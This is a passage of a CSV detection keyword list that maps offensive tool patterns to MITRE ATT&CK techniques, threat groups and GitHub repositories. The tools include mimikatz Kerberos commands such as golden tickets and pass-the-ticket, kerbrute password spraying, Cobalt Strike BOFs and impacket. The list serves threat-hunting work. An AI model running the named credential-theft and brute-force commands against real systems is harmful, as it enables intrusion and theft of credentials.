- T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,10,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*kerberos/decryptor.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*kerberos::ask*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::clist*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::golden*,offensive_tool_keyword,mimikatz,mimikatz exploitation command,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::golden*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::hash*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::list*,offensive_tool_keyword,mimikatz,mimikatz exploitation command,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::list*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. This function lists all Kerberos tickets in memory,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::ptc*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::ptt *.kirbi*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,0,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z -*kerberos::ptt*,offensive_tool_keyword,mimikatz,mimikatz exploitation command,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::ptt*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::ptt*.kirbi*,offensive_tool_keyword,mimikatz,Mimikatz Unconstrained delegation. With administrative privileges on a server with Unconstrained Delegation set we can dump the TGTs for other users that have a connection. If we do this successfully. we can impersonate the victim user towards any service in the domain.,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*kerberos::purge*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::tgt*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos_enumusers.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*kerberos-ldap-password-hunter.sh*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*kerberosv5.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*kerbrute -*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,0,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*kerbrute bruteuser *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*kerbrute passwordspray *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*kerbrute userenum *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*kerbrute userenum *,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,0,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*kerbrute*bruteforce*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*kerbrute.go*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*kerbrute/cmd*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*kerbrute/util*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*kerbrute_*.exe*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*kerbrute_enum*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*kerbrute_linux*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*kerbrute_pass_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*kerbrute_user_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*kerbrute_userpass_wordlist_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*kerbrute_windows*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*KerbruteSession*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*kernel_shellcode.asm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*kernelcallbacktable.x64*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*kernelcallbacktable.x64*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*kernelcallbacktable.x86*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*kernelcallbacktable.x86*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*kernel-exploits*,offensive_tool_keyword,Github Username,github repo name hosting windows kernel exploits,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/SecWiki/windows-kernel-exploits,1,1,N/A,N/A,10,7472,2852,2021-06-11T23:29:15Z,2017-04-25T04:02:31Z -*KernelMii.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tijme/kernel-mii,1,1,N/A,10,10,72,27,2023-05-07T18:38:29Z,2022-06-25T11:13:45Z -*KernelMii.x64.exe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tijme/kernel-mii,1,1,N/A,10,10,72,27,2023-05-07T18:38:29Z,2022-06-25T11:13:45Z -*KernelMii.x64.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 